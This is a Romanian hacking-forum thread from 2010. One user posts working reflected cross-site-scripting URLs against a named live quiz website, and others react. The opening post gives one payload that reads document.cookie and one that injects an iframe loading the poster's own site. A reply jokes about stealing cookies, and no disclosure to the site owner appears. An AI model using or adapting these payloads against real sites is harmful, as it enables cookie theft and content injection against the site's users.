Mata-i grasa _|_
Romanian Security Team - SECURITY RESEARCH  

Go Back   Romanian Security Team - SECURITY RESEARCH > >> 1337 Zone << > XSS (cross site scripting)

XSS (cross site scripting) Discutii despre cele mai recente vulnerabilitati XSS

Reply
Old 01-04-2010, 12:18 PM   #1 (permalink)
Registered user
Bautor de whiskey
 
Ne0h's Avatar
 
Join Date: Aug 2009
Posts: 387
Rep Power: 1
Ne0h is on a distinguished road
Ne0h is offline

Default www.conquiztador.ro


hotel regim hotelier
hotel yahoo domain
XSS Screen:

Proof of Concept:
Code:
http://www.conquiztador.ro/clientstart.php?tg=1&whall=1%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/ScRiPt%3E
Iframe Screen:

Iframe Injection:
Code:
http://www.conquiztador.ro/clientstart.php?tg=1&whall=1%22%3E%3Ciframe%20src=http://ne0h.baywords.com%3E%3C/iframe%3E
__________________
"Social engineering bypasses all technologies, including firewalls."
  Reply With Quote
Sponsored Links
Re: www.conquiztador.ro
Old 01-04-2010, 12:43 PM   #2 (permalink)
Registered Users
Bautor de vin
 
Join Date: May 2008
Posts: 80
Rep Power: 2
immun3 is on a distinguished road
immun3 is offline
Default

foarte tare
  Reply With Quote
Re: www.conquiztador.ro
Old 01-04-2010, 01:46 PM   #3 (permalink)
Registered Users
Bautor de whiskey
 
go_sword's Avatar
 
Join Date: Nov 2006
Posts: 333
Rep Power: 4
go_sword is on a distinguished road
go_sword is offline
Default

o nu..nu iarasi conquiztador..nuuu
anyway..bv
__________________
// Prea mare
  Reply With Quote
Re: www.conquiztador.ro
Old 01-04-2010, 01:51 PM   #4 (permalink)
Registered user
Bautor de whiskey
 
Ne0h's Avatar
 
Join Date: Aug 2009
Posts: 387
Rep Power: 1
Ne0h is on a distinguished road
Ne0h is offline
Default

Mersi frumos.
__________________
"Social engineering bypasses all technologies, including firewalls."
  Reply With Quote
Re: www.conquiztador.ro
Old 01-04-2010, 02:32 PM   #5 (permalink)
Registered Users
Cultul betivilor
 
Join Date: Feb 2008
Location: Romania
Posts: 1,089
Rep Power: 0
Hertz is an unknown quantity at this point
Hertz is offline
Default

Mai joaca cineva conpizdador?
Hai sa furam cookieuri nu. =]
__________________
K: (x)html,css,javascript,ajax,c++,php,python,perl, ASM,action script 3.0,SQL, C#,Visual Basic,JAVA

  Reply With Quote
Re: www.conquiztador.ro
Old 01-04-2010, 02:51 PM   #6 (permalink)
Registered user
Bautor de whiskey
 
Ne0h's Avatar
 
Join Date: Aug 2009
Posts: 387
Rep Power: 1
Ne0h is on a distinguished road
Ne0h is offline
Default

Era mai interesant un SQLi,dar nu mai sunt,sau cel putin nu am mai gasit eu. )
__________________
"Social engineering bypasses all technologies, including firewalls."
  Reply With Quote
Re: www.conquiztador.ro
Old 01-04-2010, 04:52 PM   #7 (permalink)
Registered user
Cultul betivilor
 
SympleBoy22's Avatar
 
Join Date: Sep 2009
Location: htdocs
Posts: 1,065
Rep Power: 2
SympleBoy22 is on a distinguished road
SympleBoy22 is offline
Default

Asta face parte din xss-urile alea de care mi-ai zis?
__________________
  Reply With Quote
Re: www.conquiztador.ro
Old 01-04-2010, 05:05 PM   #8 (permalink)
Registered user
Bautor de whiskey
 
Ne0h's Avatar
 
Join Date: Aug 2009
Posts: 387
Rep Power: 1
Ne0h is on a distinguished road
Ne0h is offline
Default

Nu,astazi l-am gasit.
__________________
"Social engineering bypasses all technologies, including firewalls."
  Reply With Quote
Re: www.conquiztador.ro
Old 01-04-2010, 05:11 PM   #9 (permalink)
Registered Users
Bautor de whiskey
 
SirGod's Avatar
 
Join Date: Nov 2007
Location: Rm.Valcea
Posts: 307
Rep Power: 3
SirGod is on a distinguished road
Send a message via Yahoo to SirGod
SirGod is online now
Default

Si ma rog de ce faci si un PoC cu iframe?Ce vrei sa demonstrezi cu aia?Care isi e rostul?Am vazut ca e XSS.Nu trebuie sa bagi iframe,marquee si altele.
__________________
  Reply With Quote
Re: www.conquiztador.ro
Old 01-04-2010, 05:22 PM   #10 (permalink)
Registered user
Bautor de whiskey
 
Ne0h's Avatar
 
Join Date: Aug 2009
Posts: 387
Rep Power: 1
Ne0h is on a distinguished road
Ne0h is offline
Default

Nu toti stiu si de iframe asa ca il adaug si pe el,nu deranjeaza pe nimeni.Sau te deranjeaza?
__________________
"Social engineering bypasses all technologies, including firewalls."
  Reply With Quote
Reply

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On
Forum Jump




Copywr0ng (c) 2009 Miercuri catre Joi - RST
All logos and trademarks in this site are property of their respective

Hosted by powerhost.ro